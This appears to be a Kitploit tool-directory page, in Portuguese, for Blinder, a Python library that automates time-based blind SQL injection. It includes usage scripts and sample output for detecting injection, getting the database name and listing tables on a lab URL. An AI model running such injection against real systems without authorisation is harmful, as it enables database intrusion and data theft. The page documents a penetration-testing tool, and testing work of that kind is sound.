Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blinder — Uma biblioteca Python para automatizar injeção SQL cega baseada em tempo. | Kitploit
Ferramentas/GitHubGitHub/mhaskar/blinder
Análise de VulnerabilidadesSegurança WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubmhaskar/blinder

Blinder

Uma biblioteca Python para automatizar injeção SQL cega baseada em tempo.

Ver Repositório
5015há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Blinder

Blinder é uma pequena biblioteca Python para automatizar injeção SQL cega baseada em tempo, utilizando consultas pré-definidas como funções para agilizar o desenvolvimento de PoCs.

Instalação

Você pode instalar o Blinder usando o seguinte comando:

pip install blinder

Ou baixando o código-fonte e importando-o manualmente para o seu projeto.

Uso

Para usar o Blinder, você precisa importar o módulo Blinder e então começar a usar as funções principais do Blinder.

Você pode usar o Blinder "na versão atual" para fazer o seguinte:

  • Verificar injeção baseada em tempo.
  • Obter o nome do banco de dados.
  • Obter os nomes das tabelas.

Você pode verificar a injeção em uma URL usando o seguinte código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

O resultado da execução será:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Você pode obter o nome do banco de dados usando o seguinte código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

E os resultados serão:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Para obter os nomes das tabelas, você pode usar o seguinte código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

E os resultados serão:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

Muitas funcionalidades devem ser adicionadas em breve, como:

  • a capacidade de adicionar consulta personalizada
  • testar pontos de injeção baseados em requisição do Burp
  • extrair dados de tabelas/colunas
Baixar ferramenta